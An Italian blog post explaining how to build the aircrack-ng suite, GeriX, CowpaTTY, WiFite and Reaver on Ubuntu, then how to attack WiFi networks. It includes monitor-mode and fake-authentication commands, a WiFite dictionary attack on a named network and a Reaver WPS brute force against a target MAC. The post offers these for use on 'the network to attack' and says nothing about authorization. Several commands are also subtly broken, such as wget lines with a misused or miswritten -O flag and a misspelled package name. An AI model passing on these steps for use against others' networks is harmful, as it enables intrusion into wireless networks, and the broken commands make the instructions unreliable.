Ad Menu

AirCrack-NG

AirCrack-NG:
In Precise Pangolin non abbiamo più 'airckrack-ng' nel repository, dobbiamo quindi scaricare il sorgente e compilare.
AirCrack è una suite che ci fornisce i seguenti programmi: airbase-ng, airdriver-ng, aireplay-ng, airmon-ng, airodump-ng, airodump-ng-oui-update, airserv-ng, airtun-ng.
Questo software è multi-piattaforma ed è necessario per far passare la nostra scheda di rete WIFi alla modalità promiscua, per poi effettuare le varie operazioni d'attacco.
Vi sono diversi strumenti d'aiuto che vi posso indicare, tra cui: "GeriX WiFi Cracker-NG", "WiFite con CowpaTTY", e "Reaver".
Le varie procedure di cracking richiedono comunque del tempo, le istruzioni e i vari parametri da usare si trovano alle rispettive homepage indicate in fondo al post.



Installazione di AirCrack-NG:
Aprire un terminale e digitare:

sudo apt-get install build-essential libssl-dev libpcap0.8 macchanger pyrit

wget -O http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz

tar -zxvf aircrack-ng-1.1.tar.gz

cd aircrack-ng-1.1

Prima di procedere dobbiamo fare una modifica:

gedit ./common.mak

Trovare la stringa:

CFLAGS?= -g -W -Wall -Werror -O3

Eliminare il termine "-Werror" da farlo diventare:

CFLAGS?= -g -W -Wall -O3

Salvare, chiudere e compilare con:

make

sudo make install


Installazione di GeriX:
Scaricare l'archivio da: Qui.
Spacchettare l'archivio e avviare da amministratore il file: "gerix.py".
Se lo volete installare, spostate la cartella da amministratore in: "/usr/share", e vi create un lanciatore con "alacarte".



Installazione di CowpaTTY:

wget -O http://www.wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz

tar zxfv cowpatty-4.6.tgz

cd cowpatty-4.6

make

sudo make install

Installazione di WiFiTe:

wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py

chmod +x wifite.py

Per avviare l'interfaccia:

sudo ./wifite.py

Per visualizzare l'elenco delle opzioni:

./wifite.py -help

Il programma può essere utilizzato tramite la GUI o da terminale con argomenti, ad esempio, per un attacco continuo:

sudo ./wifite.py -e "Infostrada" -wepw 0 --dict /pentest/passwords/wordlists/darkc0de.lst

Dove "Infostrada" è da sostituire con il nome della rete da attaccare.
Se si usa l'interfaccia, selezionare il driver, il dizionario di cowpatty (/pentest/passwords/wordlists/darkc0de.lst), e pigiare il pulsante rosso.


Installazione di Reaver:

sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-deve

wget -0 http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

tar -xzvf reaver-1.4.tar.gz

cd reaver-1.4/src

./configure

make

sudo make install

Impostare la scheda di rete WiFi in modalità promiscua con:

sudo airmon-ng start wlan0

sudo aireplay-ng mon0 --fakeauth 0 -e Infostrada

Dove "Infostrada" è il nome della rete da attaccare per ottenere l'indirizzo MAC.
Avviare Reaver con:

sudo reaver -i mon0 -b 00:00:00:00:00:00

Dove: 00:00:00:00:00:00 deve essere sostituito con l'indirizzo MAC della rete da attaccare, ci sarà lo scorrimento nel terminale.


Homepage di "AirCrack-NG": Qui.
Homepage di "GeriX WiFi Cracker-NG": Qui.
Homepage di "CowpaTTY": Qui.
Homepage di "WiFite": Qui.
Homepage di "Reaper": Qui.
Questo è tutto;)


Share/Bookmark
Stampa il Post - Print this Post

Comments :

0 commenti to “ AirCrack-NG ”
Related Posts with Thumbnails